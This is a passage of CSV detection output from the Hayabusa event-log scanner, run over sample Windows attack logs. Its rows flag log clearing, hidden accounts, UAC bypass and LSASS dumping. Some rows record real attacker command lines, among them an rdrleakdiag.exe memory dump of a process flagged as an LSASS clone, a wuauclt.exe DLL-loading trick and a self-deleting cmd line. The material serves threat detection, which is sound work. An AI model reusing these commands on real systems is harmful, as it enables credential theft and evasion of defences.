: User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 
+09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx +2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-24 01:49:41.578 
+09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: 
C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 
03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : 
Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe 
/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.902 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product 
Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 